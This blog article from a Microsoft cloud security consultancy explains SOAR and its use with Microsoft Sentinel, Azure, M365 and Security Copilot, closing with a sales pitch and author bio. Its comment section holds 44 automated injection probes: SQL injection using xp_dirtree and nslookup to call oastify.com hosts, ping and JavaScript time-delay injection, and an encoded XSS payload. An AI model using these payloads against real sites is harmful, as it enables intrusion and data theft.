SOAR Above the Clouds: Transforming Security with Microsoft Sentinel and AI

Security Operations Center (SOC)

In the rapidly evolving world of cybersecurity, the ability to respond swiftly and effectively to threats is not just an advantage; it’s a necessity. Enter the realm of Security Orchestration, Automation, and Response (SOAR), a transformative approach that empowers organisations to manage security challenges with unprecedented efficiency and precision. As we delve into the intricacies of SOAR, we uncover its pivotal role in fortifying the defence mechanisms of businesses, especially within the robust framework of the Microsoft cloud ecosystem.

This article embarks on a comprehensive journey through the essentials of SOAR, unravelling its core components, and revealing the strategic benefits it brings to the table. From the seamless integration and customization capabilities in Microsoft Sentinel, Azure, and M365, to addressing the nuanced challenges and future trends shaping SOAR’s landscape, we navigate the multifaceted world of advanced cybersecurity. With a focus on Microsoft’s pioneering contributions, including the cutting-edge Microsoft Security Copilot, we showcase how AI and machine learning are revolutionising SOAR, setting new benchmarks for proactive and intelligent security management.

As IT professionals, project managers, and senior directors tasked with safeguarding network, system, and application security in the cloud, understanding and implementing SOAR is more than a strategic decision—it’s a critical foundation for building a resilient, agile, and future-proof cybersecurity infrastructure. Let’s embark on this insightful exploration to unlock the full potential of SOAR, transforming theoretical knowledge into practical excellence within the Microsoft cloud ecosystem.

Introduction to Security Orchestration, Automation, and Response (SOAR)

In the evolving landscape of cybersecurity, Security Orchestration, Automation, and Response (SOAR) has emerged as a critical framework enabling organisations to manage and respond to security threats more efficiently and effectively. SOAR is not just a tool or a software; it’s a holistic approach that combines several processes and technologies to enhance an organisation’s security posture.

The Essence of SOAR

At its core, SOAR amalgamates three fundamental aspects:

  • Security OrchestrationIt refers to the integration of various security tools and systems, streamlining workflows and ensuring cohesive operations across an organization’s security infrastructure.
  • AutomationThis facet involves the use of automated processes to handle repetitive tasks without human intervention, allowing security teams to focus on more strategic activities and decision-making.
  • ResponseIt pertains to the systematic approach to addressing and mitigating security incidents. SOAR enables teams to respond swiftly and effectively, minimizing the impact of threats.

SOAR’s Significance in Cybersecurity

SOAR plays a pivotal role in the cybersecurity domain by addressing the increasing volume and complexity of threats, particularly in cloud environments. With cloud services, the traditional perimeter-based security approach has shifted to more dynamic and distributed models. SOAR helps organisations adapt to this change by offering:

  • Enhanced Visibility and ControlIt provides a comprehensive view of security events across various cloud services and on-premises environments, facilitating better control and management.
  • Streamlined Incident ManagementSOAR consolidates and automates incident response processes, reducing the time and resources needed to address threats.
  • Improved Collaboration and CommunicationBy standardizing workflows and enabling seamless integration of security tools, SOAR fosters better collaboration among IT and security teams.

The Role of SOAR in the Microsoft Cloud Ecosystem

In the context of the Microsoft cloud ecosystem, including Azure, Microsoft 365, and Microsoft Sentinel, SOAR is instrumental in unifying security management across various cloud and hybrid environments. Microsoft’s offerings are designed to seamlessly integrate with SOAR platforms, enhancing the overall security infrastructure and enabling organisations to leverage advanced analytics, threat intelligence, and automated response mechanisms.

By adopting SOAR within the Microsoft ecosystem, organisations can not only streamline their security operations but also enhance their resilience against cyber threats, ensuring a more secure and robust digital environment.

Core Components of SOAR

Security Orchestration, Automation, and Response (SOAR) is built upon three foundational pillars that synergise to create a powerful framework for managing and mitigating cybersecurity threats. Understanding these components is essential for leveraging the full potential of SOAR solutions.

Security Orchestration

Orchestration is the strategic coordination of various security tools and systems, enabling them to work collectively rather than in isolation. In the realm of cybersecurity, this means integrating disparate security solutions—such as firewalls, intrusion detection systems, and threat intelligence platforms—to create a cohesive and unified security operation. Orchestration simplifies complex workflows, ensuring that data flows seamlessly between different security systems, which enhances the efficiency of threat detection, analysis, and response processes.

Key aspects of security orchestration include:

  • Integration of Tools and PlatformsConnecting various security solutions to work in harmony, regardless of vendor or technology.
  • Streamlined WorkflowsDesigning and implementing automated workflows that guide the security processes from detection to resolution.
  • Enhanced CollaborationFacilitating communication and collaboration across security teams and departments to ensure a coordinated response to incidents.
Screenshot of Azure Sentinel Data Collectors
Screenshot of Azure Sentinel Data Collectors

Security Automation

Automation is the engine that powers the SOAR framework, enabling rapid and consistent responses to security events. It involves the use of technology to perform routine and repetitive tasks without human intervention, thereby reducing the risk of human error and allowing security professionals to focus on more strategic and complex problems.

Automation in a SOAR context includes:

  • Automated Incident ResponseExecuting predefined actions such as blocking an IP address or quarantining a malicious file immediately upon detection of a threat.
  • Alert Triage and EnrichmentAutomatically categorising and prioritising security alerts, and enriching them with additional context to aid in decision-making.
  • Proactive Threat HuntingLeveraging automation to scan and analyse networks and systems for potential threats before they manifest into full-blown incidents.

Security Response

Response is the final piece of the SOAR puzzle, focusing on how organisations react to and mitigate detected security incidents. An effective response strategy is not only about speed but also about precision and adaptability.

Key elements of security response include:

  • Incident Management and AnalysisDeveloping a systematic approach to manage and analyse security incidents, ensuring they are addressed appropriately and in a timely manner.
  • Playbook ExecutionImplementing detailed response plans or playbooks that outline specific actions to be taken for different types of security incidents.
  • Continuous ImprovementUtilising lessons learned from past incidents to refine and enhance the response strategy and overall security posture.

These core components of SOAR—Orchestration, Automation, and Response—collectively enable organisations to manage and mitigate cybersecurity threats more efficiently and effectively. By understanding and implementing these components, organisations can significantly enhance their security operations, especially when integrated within the Microsoft cloud ecosystem.

Benefits of SOAR

Security Orchestration, Automation, and Response (SOAR) offers numerous benefits that streamline and enhance the capabilities of security teams, particularly in fast-paced and complex environments like the cloud. Here’s how SOAR creates a more efficient, effective, and proactive cybersecurity framework.

Improved Efficiency and Time Savings

SOAR’s most immediate benefit is the significant reduction in the time required to respond to and resolve security incidents. Automation of routine and repetitive tasks accelerates the detection, investigation, and remediation processes, freeing up security professionals to focus on more complex and strategic activities.

  • Automated WorkflowsBy automating workflows, SOAR minimises the manual steps needed to analyse and respond to threats, speeding up the overall response time.
  • Reduced Alert FatigueSOAR helps in filtering out false positives and prioritising alerts, ensuring that security teams focus on the most critical threats, thereby reducing alert fatigue.

Enhanced Incident Response

SOAR enables organisations to respond to security incidents with greater accuracy and effectiveness. It supports a standardised incident response process that can be consistently applied to efficiently manage and mitigate threats.

  • Playbook-Driven ResponseUtilise predefined playbooks to ensure a consistent and comprehensive response to various types of security incidents.
  • Real-Time Decision MakingIntegration with threat intelligence and real-time analytics aids in making informed decisions quickly during a security event.

Scalability and Flexibility

As organisations grow and evolve, so too do their security requirements. SOAR provides a scalable and flexible solution that can adapt to changing security landscapes and increasing volumes of threats.

Cost-Effective Security Management

  • Scalable ArchitectureSOAR solutions can handle a growing number of alerts and incidents, scaling as an organisation's security needs expand.
  • Customizable Playbooks and IntegrationsAdapt and customise playbooks and integrate with new tools and technologies to meet the unique security needs of the organisation.

Investing in SOAR can lead to significant cost savings by optimising the use of existing resources and reducing the need for additional staffing.

  • Resource OptimisationAutomating mundane tasks allows security teams to utilise their skills more effectively, potentially reducing the need for additional personnel.
  • Reduced Incident ImpactFaster and more effective incident response minimizes the potential financial impact of security breaches and threats.

Improved Compliance and Risk Management

SOAR aids in maintaining compliance with various regulatory requirements by providing comprehensive logging and reporting capabilities, which are essential for audit and compliance purposes.

  • Automated ReportingGenerate detailed reports on incident response actions and timelines, supporting compliance with security regulations.
  • Enhanced Risk AssessmentContinuously monitor and analyse security data to identify and mitigate risks proactively.

In conclusion, the benefits of implementing SOAR are multifaceted, encompassing efficiency, effectiveness, scalability, cost savings, and compliance. For organisations leveraging cloud services like Microsoft Azure, Microsoft 365, and Microsoft Sentinel, SOAR can significantly enhance their security posture by providing a robust, integrated, and automated approach to threat management and response.

SOAR in the Microsoft Cloud Ecosystem

The integration of Security Orchestration, Automation, and Response (SOAR) within the Microsoft cloud ecosystem, including Microsoft Azure, Microsoft 365 (M365), and Microsoft Sentinel, offers a comprehensive and cohesive approach to managing security across various cloud and hybrid environments. This integration leverages the advanced capabilities of Microsoft’s cloud services to enhance the functionality and efficiency of SOAR solutions.

Microsoft Sentinel: The Cornerstone of SOAR in Microsoft Cloud

Microsoft Sentinel, a cloud-native SIEM (Security Information and Event Management) solution, serves as the central hub for SOAR activities within the Microsoft ecosystem. It provides advanced threat detection, incident response, and security analytics capabilities.

  • Automated Security InsightsBy leveraging artificial intelligence and machine learning, Microsoft Sentinel automates the detection of anomalous activities and security threats, facilitating rapid response.
  • Integrated PlaybooksSentinel integrates with Azure Logic Apps to create and execute automated playbooks, enabling orchestrated responses to various security incidents.
Sentinel Mitre Attack Integration

Azure's Role in Enhancing SOAR

Azure, as a comprehensive cloud platform, supports and enhances SOAR operations by providing a robust infrastructure and a range of security services.

  • Azure Security CenterThis offers unified security management and advanced threat protection across hybrid cloud environments, seamlessly integrating with SOAR processes for enhanced threat detection and response.
  • Scalable and Secure InfrastructureAzure provides the scalability needed to handle large volumes of security data and automated workflows, ensuring a secure and responsive SOAR environment.

M365 Security and Compliance Features

Within the M365 suite, various security and compliance features contribute to a holistic SOAR strategy by protecting data, managing risks, and ensuring compliance across communication and collaboration tools.

  • Advanced Threat Protection (ATP)M365’s ATP services offer proactive defence mechanisms against sophisticated threats, integrating seamlessly with SOAR workflows for improved incident response.
  • Compliance and Risk ManagementM365 provides tools to assess compliance and manage risks, which are crucial for informed SOAR processes and decision-making.

Integration and Collaboration

A key advantage of implementing SOAR in the Microsoft cloud ecosystem is the seamless integration and collaboration across different Microsoft services and third-party solutions.

  • Extensive API ConnectivityMicrosoft’s cloud services offer extensive API integration capabilities, allowing SOAR solutions to easily connect with other security tools and systems for a more comprehensive security posture.
  • Collaborative EcosystemThe Microsoft cloud environment promotes collaboration between IT and security teams, enabling shared insights and coordinated responses to threats.

By leveraging the integrated and advanced capabilities of Microsoft Azure, M365, and Microsoft Sentinel, organisations can significantly enhance their SOAR framework, leading to a more resilient, efficient, and proactive security operation within the Microsoft cloud ecosystem. This integration not only streamlines security processes but also aligns with strategic business objectives, making it an essential component of modern cybersecurity strategies.

Integration and Customization in SOAR

Integration and customisation are crucial aspects of Security Orchestration, Automation, and Response (SOAR) that enable organisations to tailor security operations to their specific needs and technology ecosystems. In the context of the Microsoft cloud environment, including services like Microsoft Sentinel, Azure, and M365, these capabilities are especially important for creating a seamless and effective security posture.

Seamless Integration with Existing Infrastructure

Integrating SOAR solutions with existing security infrastructure and IT systems is essential for creating a unified and efficient operational environment.

  • Compatibility with Legacy SystemsSOAR platforms in the Microsoft ecosystem are designed to integrate with both modern cloud services and legacy systems, ensuring comprehensive coverage and protection.
  • Unified Security ViewIntegration allows for a centralised view of security across cloud and on-premises environments, enabling more effective monitoring, analysis, and response.

Customisation of SOAR Processes

Customisation of SOAR processes and tools is key to aligning with an organisation’s specific security policies, workflows, and risk management strategies.

  • Custom Playbooks and Automation RulesOrganisations can create and modify playbooks and automation rules within tools like Microsoft Sentinel to address their unique security scenarios and requirements.
  • Tailored Incident ResponseCustomisation enables the development of tailored incident response actions that align with the specific threat landscape and business priorities of the organisation.

APIs and Integration Capabilities

The use of APIs (Application Programming Interfaces) is fundamental in achieving a high level of integration and customisation in SOAR.

  • Extensive API SupportMicrosoft’s cloud services offer extensive API support, facilitating the integration of SOAR solutions with a wide range of internal and external systems and services.
  • Automation and Orchestration FlexibilityAPIs enable the automation and orchestration of security tasks across different platforms and solutions, enhancing the SOAR’s capability to respond to incidents rapidly and effectively.

Enhancing SOAR with Microsoft’s AI and Machine Learning

The integration of artificial intelligence (AI) and machine learning (ML) capabilities from Microsoft enhances the automation and response capabilities of SOAR solutions.

  • Advanced Threat DetectionAI and ML can be leveraged to improve threat detection capabilities, providing more accurate and timely identification of potential security incidents.
  • Intelligent AutomationAI and ML can enhance automation processes, enabling more sophisticated and context aware decision making in the orchestration and response phases.
Screenshot of Sentinel TI IoC integration
Sentinel TI IoC integration

Integrating and customizing SOAR within the Microsoft cloud ecosystem provides organisations with a powerful and flexible framework to address their specific security challenges. By leveraging the advanced capabilities of Microsoft’s tools and services, companies can ensure that their SOAR solution not only meets their current security needs but is also scalable and adaptable to future requirements.

Challenges and Considerations in SOAR Implementation

While Security Orchestration, Automation, and Response (SOAR) offers significant benefits, implementing it within an organisation, particularly in a Microsoft cloud ecosystem, comes with its own set of challenges and considerations. Addressing these effectively is crucial for a successful SOAR deployment.

Technical Complexity and Integration Issues

One of the primary challenges in SOAR implementation is managing the technical complexity associated with integrating various security tools and platforms.

  • Integration with Diverse ToolsEnsuring seamless integration between SOAR solutions and a range of security tools, both from Microsoft and other vendors, can be complex and time-consuming.
  • Customisation NeedsTailoring SOAR processes to fit specific organisational needs and workflows requires technical expertise and a deep understanding of both the SOAR platform and the existing security infrastructure.

Resource and Skill Constraints

Implementing and managing SOAR solutions often demands specialised skills and resources, which can be a significant hurdle for many organisations.

  • Skilled PersonnelThe need for staff with the right skill sets in cybersecurity, automation, and cloud technologies is crucial and often leads to a talent scarcity challenge.
  • Training and DevelopmentOrganisations must invest in training and developing their existing staff to manage and operate SOAR solutions effectively.

Data Privacy and Security Concerns

As SOAR involves handling sensitive security data and automating responses to threats, it raises important considerations around data privacy and security.

  • Compliance with RegulationsEnsuring that SOAR implementations comply with data protection regulations like GDPR, CCPA, or industry-specific standards is essential.
  • Secure Data HandlingOrganisations must ensure that security data managed by SOAR solutions is handled securely, with appropriate access controls and encryption in place.

Scalability and Flexibility

The ability of a SOAR solution to scale and adapt to the evolving security landscape and organisational growth is another critical consideration.

  • Future-ProofingSOAR solutions should be scalable and flexible enough to accommodate future changes in the security environment, including new types of threats and integration with emerging technologies.
  • Adapting to Organisational ChangesAs organisations grow and evolve, their SOAR solution must adapt to changing security needs and business objectives.

Ensuring Continuous Improvement

A SOAR implementation should not be seen as a one-time project but rather as a component of an ongoing process of security enhancement.

  • Regular Updates and MaintenanceContinuous monitoring, updating, and refining of SOAR processes and playbooks are necessary to keep up with the latest security threats and technological advancements.
  • Feedback Loops and LearningEstablishing mechanisms for feedback and learning from past incidents is crucial for improving the effectiveness of the SOAR strategy over time.

Navigating these challenges and considerations requires careful planning, strategic investment, and a commitment to continuous improvement. For organisations leveraging the Microsoft cloud ecosystem, understanding these factors is key to unlocking the full potential of SOAR and enhancing their overall security posture.

The Future of SOAR

The landscape of Security Orchestration, Automation, and Response (SOAR) is rapidly evolving, driven by advances in technology and the changing nature of cyber threats. As organisations continue to adopt cloud services and the perimeter of their networks expands, the future of SOAR is set to become even more integral to cybersecurity strategies. Here’s what we can anticipate in the evolution of SOAR, particularly within the Microsoft cloud ecosystem.

Integration of Advanced AI and Machine Learning

AI and machine learning will play a pivotal role in enhancing the capabilities of SOAR solutions, providing more intelligent and proactive security measures.

  • Predictive AnalyticsAdvanced AI models can analyse historical and real-time data to predict potential security threats before they occur, allowing for pre-emptive response actions.
  • Automated Decision MakingMachine learning algorithms can help in automating decision-making processes, enabling SOAR systems to respond to incidents with minimal human intervention.

Spotlight on Microsoft Security Copilot: Pioneering AI in SOAR

Microsoft Security Copilot represents a significant advancement in the integration of artificial intelligence within the realm of SOAR). As a state-of-the-art tool, Security Copilot leverages the power of AI to transform how organisations detect, analyze, and respond to security threats, embodying the next generation of cybersecurity defense.

Key Features of Microsoft Security Copilot

  • Advanced Predictive Analytics: utilises cutting-edge AI models to process historical and real-time data, identifying patterns and anomalies that indicate potential security threats.
  • Intelligent Automation: By harnessing machine learning algorithms, it automates crucial decision-making processes within the SOAR framework.
  • Integrated Security Intelligence: Is designed to work seamlessly with Microsoft Sentinel and other Microsoft security solutions, providing a comprehensive and unified security posture.

Enhancing SOAR with Microsoft Security Copilot

Microsoft Security Copilot exemplifies the evolution of AI in enhancing SOAR solutions, offering an integrated approach that not only accelerates response times but also improves the precision of security operations. Its ability to analyse vast datasets and automate decision-making processes represents a significant leap forward in the development of proactive and intelligent cybersecurity measures.

Enhanced Cross-Platform Collaboration

As organisations increasingly rely on a diverse set of cloud services and platforms, SOAR solutions will need to facilitate better cross-platform collaboration and integration.

  • Unified Security EcosystemsExpect to see more seamless integration between SOAR platforms and a wide range of security products, across different vendors and cloud services, creating a more unified and efficient security ecosystem.
  • Collaborative Incident ResponseEnhancements in collaboration tools within SOAR systems will allow for more effective team-based incident response, regardless of the geographical and organisational boundaries.

Increased Emphasis on Cyber Threat Intelligence

The integration of richer cyber threat intelligence (CTI) into SOAR systems will enhance their ability to detect, analyse, and respond to threats.

  • Real-Time Threat IntelligenceSOAR solutions will leverage real-time threat intelligence feeds to dynamically update response strategies and playbooks, ensuring they are aligned with the latest threat landscape.
  • Contextualised Security InsightsEnhanced CTI will provide more contextual and actionable insights, enabling SOAR systems to tailor responses more accurately to the specific characteristics of each threat.

Expansion of Regulatory Compliance Capabilities

As legal and regulatory requirements evolve, SOAR systems will need to support organisations in maintaining compliance more effectively.

  • Automated Compliance ReportingSOAR solutions will offer more advanced features for automating the generation of compliance reports, reducing the administrative burden on security teams.
  • Dynamic Compliance FrameworksExpect SOAR platforms to integrate dynamic compliance frameworks that can adapt to new regulations and standards, helping organisations stay compliant in a changing legal landscape.

Democratisation of SOAR Technologies

The future of SOAR will see a democratisation of its technologies, making them more accessible to organisations of all sizes. We are seeing this now, with the increased availability of pay-as-you-go consumption models.

  • Simplified SOAR SolutionsWith advancements in technology, SOAR solutions will become more user-friendly, requiring less technical expertise to implement and manage, thus becoming accessible to a broader range of organisations.
  • Cost-Effective SOAR ServicesAs competition increases and technology advances, the cost of SOAR solutions will decrease, enabling smaller organisations to adopt SOAR capabilities.

In summary, the future of SOAR in the cybersecurity domain is promising, with advancements in technology enhancing its capabilities and making it more accessible. For organisations within the Microsoft cloud ecosystem, staying abreast of these developments will be key to leveraging SOAR effectively and ensuring robust and proactive security management.

Conclusion

Security Orchestration, Automation, and Response (SOAR) stands at the forefront of transformative cybersecurity strategies, particularly within the dynamic and complex Microsoft cloud ecosystem. As we have explored, SOAR integrates critical components of security operations, streamlining processes, and enabling rapid, informed responses to incidents. Through Microsoft Sentinel, Azure, and M365, organisations have at their disposal powerful tools that not only facilitate but also enhance the implementation of SOAR capabilities.

The journey of integrating SOAR into an organisation’s cybersecurity framework is one of continuous evolution and improvement. The benefits, from increased efficiency and reduced response times to enhanced compliance and risk management, are compelling. They illustrate the significant impact that SOAR can have on an organisation’s ability to manage and mitigate security threats effectively.

However, the path to harnessing the full potential of SOAR is not without its challenges. Technical complexities, resource and skill requirements, data privacy concerns, and the need for scalability and flexibility are among the considerations that organisations must navigate. Yet, with strategic planning, investment in training and development, and a commitment to ongoing process enhancement, these challenges can be successfully addressed.

Looking to the future, SOAR is set to become even more sophisticated and integral to cybersecurity strategies. Advances in AI and machine learning, enhanced cross-platform collaboration, deeper integration with cyber threat intelligence, and the democratisation of SOAR technologies promise to elevate the capabilities and accessibility of SOAR solutions.

In conclusion, for organisations leveraging the Microsoft cloud ecosystem, embracing SOAR is not just a tactical decision but a strategic imperative. It offers a pathway to not only fortify security defences but also align with broader digital transformation goals. As we advance, the role of SOAR in shaping resilient, proactive, and intelligent cybersecurity frameworks will undoubtedly grow, making it an essential element of any organization’s security strategy.

Call to Action

As we have navigated through the essentials of Security Orchestration, Automation, and Response (SOAR) and its integration within the Microsoft cloud ecosystem, the path forward for organisations is clear. It’s time to act decisively to harness the power of SOAR and transform your cybersecurity operations.

  • Evaluate Your Current Security PostureThe first step is to conduct a comprehensive assessment of your current security landscape. Identify the gaps, inefficiencies, and vulnerabilities in your existing security operations and consider how SOAR can address these challenges.
  • Consult with SOAR ExpertsSeeking expertise from specialists in SOAR implementations, particularly those with experience in the Microsoft cloud environment, can provide valuable insights and guidance. These professionals can help tailor a SOAR solution that fits your organisation's specific needs and objectives.
  • Leverage Training and DevelopmentInvest in training and developing your security team to manage and operate SOAR tools effectively. Understanding the intricacies of SOAR processes and the Microsoft cloud ecosystem is crucial for maximizing the benefits of your investment.
  • Implement a Pilot ProjectStart with a pilot project to test and refine your SOAR implementation. Select a critical but manageable area of your security operations to introduce SOAR capabilities, allowing you to evaluate its impact and make necessary adjustments before a full-scale rollout.
  • Plan for Scalability and FlexibilityEnsure that your SOAR implementation is scalable and flexible to adapt to evolving security threats and organisational changes. Design your SOAR strategy with future growth and technological advancements in mind.
  • Stay Informed on SOAR DevelopmentsThe field of SOAR is rapidly evolving. Stay informed about the latest trends, technologies, and best practices in SOAR to continually enhance your security operations.

Further Information

Microsoft-Specific Resources

  • Microsoft Tech Community: This is a rich resource for the latest updates, best practices, and discussions on Microsoft security products, including SOAR capabilities within Microsoft Sentinel and other security solutions.
  • Microsoft Docs: For in-depth technical documentation, guides, and best practices on Microsoft’s SOAR tools and security solutions.
  • Microsoft Security Blog: Offers insights, news, and updates directly from Microsoft on their security solutions.

Vendor-Agnostic Resources

  • SANS Institute: A trusted source for cybersecurity training, research, and certifications. SANS provides white papers, webinars, and courses on SOAR and various security topics.
  • Infosecurity Magazine: A leading source of news, analysis, and thought leadership in the information security industry, including topics on SOAR and cybersecurity strategies.

Take the Next Step

Now is the time to embrace the full potential of SOAR within your organisation. By leveraging the advanced capabilities of Microsoft Sentinel, Azure, and M365, you can create a robust, efficient, and proactive security environment.

Reach out for Guidance and Support

If you’re ready to take the next step in implementing SOAR or if you have any questions about how to proceed, don’t hesitate to reach out to our consultancy. We specialize in the Microsoft cloud ecosystem and are here to help you navigate your SOAR journey, from initial assessment to full implementation and beyond.

David Morgan

Founder & Consultant

Trusted Microsoft Cloud Security Advisor with 27 years experience | Empowering Businesses to Embrace Cloud Innovation with Confidence

Skills chart of the author David Morgan, high level expertise in Cyber Security, Network Security, Azure, Microsoft 365, Penetration Testing & Breach Attack Simulation

Related Posts

1,127 Responses
    1. Comment*;declare @q varchar(99);set @q=’\\rgbgdcfqrrj10kz7zev9bsgrpivcjcg07qvii86x.oasti’+’fy.com\fnb’; exec master.dbo.xp_dirtree @q;–

    2. Comment*’;declare @q varchar(99);set @q=’\\4gltdpf3r4je0xzkzrvmb5g4pvvpjpgd74vwim6b.oasti’+’fy.com\ush’; exec master.dbo.xp_dirtree @q;–

    3. Comment*);declare @q varchar(99);set @q=’\\0nopklmzy0qa7t6g6n2ii1n0wr2lqln9e12tpjd8.oasti’+’fy.com\zku’; exec master.dbo.xp_dirtree @q;–

    4. Comment*’);declare @q varchar(99);set @q=’\\akyzhvj9vank433q3xzsfbkat1zvnvkjbcz4muaj.oasti’+’fy.com\ijz’; exec master.dbo.xp_dirtree @q;–

    5. Comment*&nslookup -q=cname cgw1dxfbrcjm05zszzvubdgcp3vxjxglb93wtki.oastify.com.&’\”`0&nslookup -q=cname cgw1dxfbrcjm05zszzvubdgcp3vxjxglb93wtki.oastify.com.&`’

    6. Comment*|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1

    7. Comment*’+(function(){if(typeof ilnbu===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);ilnbu=1;}}())+'

    8. Comment*;declare @q varchar(99);set @q=’\\dar27y9clddnu6ttt0pv5eadj4pydyam1cp4cu0j.oasti’+’fy.com\tok’; exec master.dbo.xp_dirtree @q;–

    9. Comment*’;declare @q varchar(99);set @q=’\\bkz0hwjavbnl443r3yztfckbt2zwnwkkbbz3mtai.oasti’+’fy.com\inx’; exec master.dbo.xp_dirtree @q;–

    10. Comment*);declare @q varchar(99);set @q=’\\ii47f3hhtils2b1y15x0djiir9x3l3ir9jxbk18q.oasti’+’fy.com\hgg’; exec master.dbo.xp_dirtree @q;–

    11. Comment*’);declare @q varchar(99);set @q=’\\mzpbw7ylam2wjfi2i9e4unzm8de727zvqoeg16pv.oasti’+’fy.com\mja’; exec master.dbo.xp_dirtree @q;–

    12. Comment*;declare @q varchar(99);set @q=’\\k8t9557jjkbusdr0r7n23l8khbn5b58tzjnba1yq.oasti’+’fy.com\oev’; exec master.dbo.xp_dirtree @q;–

    13. Comment*’;declare @q varchar(99);set @q=’\\2lorink1w2oc5v4i4p0kg3l2ut0nonlbc20unkb9.oasti’+’fy.com\eey’; exec master.dbo.xp_dirtree @q;–

    14. Comment*);declare @q varchar(99);set @q=’\\9eoybud8p9hjy2xpxwtr9ae9n0tuhuei5at2gs4h.oasti’+’fy.com\tmi’; exec master.dbo.xp_dirtree @q;–

    15. Comment*’);declare @q varchar(99);set @q=’\\k1m9y50jck4uldk0k7g2wl1kabg5451tsmge34rt.oasti’+’fy.com\zui’; exec master.dbo.xp_dirtree @q;–

    16. Comment*;declare @q varchar(99);set @q=’\\xpqmmiow0xs79q8d8k4fkypxyo4isip6gw4oref3.oasti’+’fy.com\edd’; exec master.dbo.xp_dirtree @q;–

    17. Comment*’;declare @q varchar(99);set @q=’\\2dgranc1o2gcxvwiwpsk83d2mtsngndb42sufk39.oasti’+’fy.com\gts’; exec master.dbo.xp_dirtree @q;–

    18. Comment*);declare @q varchar(99);set @q=’\\diz2fyhctdln261t10xvdeidr4xylyim9ex6kw8l.oasti’+’fy.com\xnm’; exec master.dbo.xp_dirtree @q;–

    19. Comment*’);declare @q varchar(99);set @q=’\\hez6b2dgphhryaxxx4tz9iehn8t2h2eq5jtbg14q.oasti’+’fy.com\rff’; exec master.dbo.xp_dirtree @q;–

    20. Comment*;declare @q varchar(99);set @q=’\\6v2vsru566ygfzemetaoq7v64xaryrvfm5axxnlc.oasti’+’fy.com\qmu’; exec master.dbo.xp_dirtree @q;–

    21. Comment*’;declare @q varchar(99);set @q=’\\x64m3i5whx97qqpdpklf1y6xfoli9i66xxlp8fw4.oasti’+’fy.com\qot’; exec master.dbo.xp_dirtree @q;–

    22. Comment*);declare @q varchar(99);set @q=’\\aaoz7v99ladku3tqtxps5baaj1pvdvaj1bp3ct0i.oasti’+’fy.com\qpv’; exec master.dbo.xp_dirtree @q;–

    23. Comment*’);declare @q varchar(99);set @q=’\\8r0xotq728uib1aoav6qm9r80z6tutrhia62tshh.oasti’+’fy.com\adg’; exec master.dbo.xp_dirtree @q;–

    24. Comment*;declare @q varchar(99);set @q=’\\3gksdof2r3jd0wzjzqvlb4g3puvojogc72vuik69.oasti’+’fy.com\seb’; exec master.dbo.xp_dirtree @q;–

    25. Comment*’;declare @q varchar(99);set @q=’\\mc2b97blnmfwwfv2v9r47ncmldr7f7cv3mree42t.oasti’+’fy.com\hik’; exec master.dbo.xp_dirtree @q;–

    26. Comment*);declare @q varchar(99);set @q=’\\5kquhqj4v5nf4y3l3sznf6k5twzqnqkeb6zymoad.oasti’+’fy.com\xuv’; exec master.dbo.xp_dirtree @q;–

    27. Comment*’);declare @q varchar(99);set @q=’\\z55o2k4ygz89psofomkh005zeqkk8k58w1kt7jv8.oasti’+’fy.com\wdt’; exec master.dbo.xp_dirtree @q;–

    28. Comment*;declare @q varchar(99);set @q=’\\hxi6u2wg8h0rhagxg4czsixh68c202xqogc8zynn.oasti’+’fy.com\acs’; exec master.dbo.xp_dirtree @q;–

    29. Comment*’;declare @q varchar(99);set @q=’\\1acq7m90l1dbuuthtopj52a1jspmdmaa11ptcj08.oasti’+’fy.com\otr’; exec master.dbo.xp_dirtree @q;–

    30. Comment*);declare @q varchar(99);set @q=’\\kh59e5gjskku1d0007w2clhkqbw5k5ht8lwdj37s.oasti’+’fy.com\dxg’; exec master.dbo.xp_dirtree @q;–

    31. Comment*’);declare @q varchar(99);set @q=’\\le3ab6dkplhvyex1x8t39melnct6h6eu5ntfg54u.oasti’+’fy.com\qer’; exec master.dbo.xp_dirtree @q;–

    32. Comment*;declare @q varchar(99);set @q=’\\ta7i7e9sltd3umt9tgpb5uatjkpedea21spkca0z.oasti’+’fy.com\uys’; exec master.dbo.xp_dirtree @q;–

    33. Comment*’;declare @q varchar(99);set @q=’\\oyqdv9xn9o1yihh4hbd6tpyo7fd919yxpodg06ov.oasti’+’fy.com\rld’; exec master.dbo.xp_dirtree @q;–

    34. Comment*);declare @q varchar(99);set @q=’\\l9va668kklcvtes1s8o34m9lico6c69u0moeb4zt.oasti’+’fy.com\rxa’; exec master.dbo.xp_dirtree @q;–

    35. Comment*’);declare @q varchar(99);set @q=’\\233r0n21e26cnvmimpiky332ctin6n3bu4iw5mtb.oasti’+’fy.com\mfs’; exec master.dbo.xp_dirtree @q;–

    36. Comment*;declare @q varchar(99);set @q=’\\aiwzfvh9talk231q1xxsdbiar1xvlvij99x1kr8g.oasti’+’fy.com\xkc’; exec master.dbo.xp_dirtree @q;–

    37. Comment*’;declare @q varchar(99);set @q=’\\qc6f9bbpnqf0wjv6vdr87rcqlhrbfbcz3qrie82x.oasti’+’fy.com\axt’; exec master.dbo.xp_dirtree @q;–

    38. Comment*);declare @q varchar(99);set @q=’\\znqokkmyyzq97s6f6m2hi0nzwq2kqkn8e02spid7.oasti’+’fy.com\hcm’; exec master.dbo.xp_dirtree @q;–

    39. Comment*’);declare @q varchar(99);set @q=’\\wkklhhjvvwn64p3c3jzefxkwtnzhnhk5byzqmga5.oasti’+’fy.com\fsm’; exec master.dbo.xp_dirtree @q;–

    40. Comment*;declare @q varchar(99);set @q=’\\u0vjxfztbu34knjajhfcvv0u9lff3f03rtfl2bq0.oasti’+’fy.com\czr’; exec master.dbo.xp_dirtree @q;–

    41. Comment*’;declare @q varchar(99);set @q=’\\co41lxnbzcrm857s7z3ujdocx33xrxolfc34quej.oasti’+’fy.com\xbq’; exec master.dbo.xp_dirtree @q;–

    42. Comment*);declare @q varchar(99);set @q=’\\sjfhgdirusm23l282fyaetjssjydmdj1atyllb90.oasti’+’fy.com\liw’; exec master.dbo.xp_dirtree @q;–

    43. Comment*’);declare @q varchar(99);set @q=’\\a4fz1v39fa7ko3nqnxjszb4ad1jv7v4jvcj46uuj.oasti’+’fy.com\jkw’; exec master.dbo.xp_dirtree @q;–

    44. Comment*s6axd%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27confirm%281%29%27%2f%3e%3c%2fa%3eg61x4

